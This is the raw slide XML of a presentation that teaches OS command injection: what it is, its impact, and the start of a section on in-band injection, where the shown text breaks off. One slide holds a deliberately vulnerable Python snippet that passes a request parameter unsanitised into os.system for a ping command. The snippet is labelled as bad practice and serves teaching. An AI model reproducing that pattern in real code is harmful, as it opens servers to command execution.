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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId13"/>
      <p:bold r:id="rId14"/>
      <p:italic r:id="rId15"/>
      <p:boldItalic r:id="rId16"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId17"/>
      <p:bold r:id="rId18"/>
      <p:italic r:id="rId19"/>
      <p:boldItalic r:id="rId20"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Slab" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId21"/>
      <p:bold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67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6783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US" dirty="0"/>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607042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100320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US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>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9858201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7924007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38150"/>
            <a:ext cx="12618720" cy="159067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8850199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6732015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4107144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Content Placeholder 2"/>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4071669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19826" y="1184911"/>
            <a:ext cx="7406640" cy="5848350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>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9370843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1554961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0" y="438150"/>
            <a:ext cx="3154680" cy="697420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6262277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066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597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420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645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493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6165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775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80190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30638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3345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C764DE79-268F-4C1A-8933-263129D2AF90}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10/12/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>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615177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sldNum="0"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408878"/>
            <a:ext cx="6144339" cy="708779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>OS Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280190" y="4457819"/>
            <a:ext cx="7556421" cy="362903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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282541"/>
            <a:ext cx="8622387" cy="708779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>What is OS Command Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2558296"/>
            <a:ext cx="6244709" cy="850583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Tricking the Server's Operating System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3635693"/>
            <a:ext cx="6244709" cy="1814513"/>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OS Command Injection is a critical web vulnerability that enables attackers to execute arbitrary operating system commands on the host server. This occurs when applications pass unsanitized user input directly to system shell commands.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5654278"/>
            <a:ext cx="6244709" cy="1088708"/>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The root cause is simple yet devastating: developers trust user data without proper validation, allowing malicious commands to piggyback on legitimate operations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="2558296"/>
            <a:ext cx="3433405" cy="354330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Vulnerable Code Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="3167777"/>
            <a:ext cx="6244709" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2381"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7588210" y="3167777"/>
            <a:ext cx="6267331" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2381"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EEEFF1"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7815024" y="3337798"/>
            <a:ext cx="5813703" cy="1088708"/>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highlight>
                  <a:srgbClr val="EEEFF1"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t># Bad practice: Directly using user inputip_address = request.args.get('ip')os.system(f"ping -c 3 {ip_address}")</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="4851678"/>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This code directly incorporates user input into a shell command without sanitization—a critical security flaw.</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641747"/>
            <a:ext cx="6379131" cy="708779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The Devastating Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="1441252"/>
            <a:ext cx="5078016" cy="425291"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3300"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>What Can an Attacker Achieve?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2206704"/>
            <a:ext cx="4196358" cy="2577108"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1320"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>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1020604" y="2433518"/>
            <a:ext cx="680442" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207770" y="2582347"/>
            <a:ext cx="306110" cy="382667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020604" y="334077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13F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Data Theft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020604" y="3831193"/>
            <a:ext cx="3742730"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Extract credentials, configuration files, and sensitive business data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216962" y="2206704"/>
            <a:ext cx="4196358" cy="2577108"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1320"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5443776" y="2433518"/>
            <a:ext cx="680442" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 3" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5630942" y="2582347"/>
            <a:ext cx="306110" cy="382667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5443776" y="334077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13F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>File Manipulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5443776" y="3831193"/>
            <a:ext cx="3742730"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Modify, delete, or upload malicious files to the system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9640133" y="2206704"/>
            <a:ext cx="4196358" cy="2577108"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1320"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Image 4" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9866948" y="2433518"/>
            <a:ext cx="680442" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Image 5" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10054114" y="2582347"/>
            <a:ext cx="306110" cy="382667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9866948" y="334077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13F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Malware Installation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9866948" y="3831193"/>
            <a:ext cx="3742730"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Deploy backdoors and persistent access mechanisms</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5010626"/>
            <a:ext cx="6407944" cy="2577108"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1320"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Image 6" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020604" y="5237440"/>
            <a:ext cx="680442" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Image 7" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207770" y="5386268"/>
            <a:ext cx="306110" cy="382667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020604" y="6144697"/>
            <a:ext cx="3016925" cy="354330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="15213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Complete Compromise</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1020604" y="6635115"/>
            <a:ext cx="5954316" cy="362903"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Achieve full remote code execution and server takeover</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7428548" y="5010626"/>
            <a:ext cx="6407944" cy="2577108"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1320"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E9ECF2"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Image 8" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7655362" y="5237440"/>
            <a:ext cx="680442" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Image 9" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7842528" y="5386268"/>
            <a:ext cx="306110" cy="382667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7655362" y="614469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5213F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Lateral Movement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7655362" y="6635115"/>
            <a:ext cx="5954316"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Reconnaissance of internal networks and privilege escalation</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892612"/>
            <a:ext cx="9570482" cy="708779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="5550"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4450" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3257B8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Type 1: In-Band Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4450" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
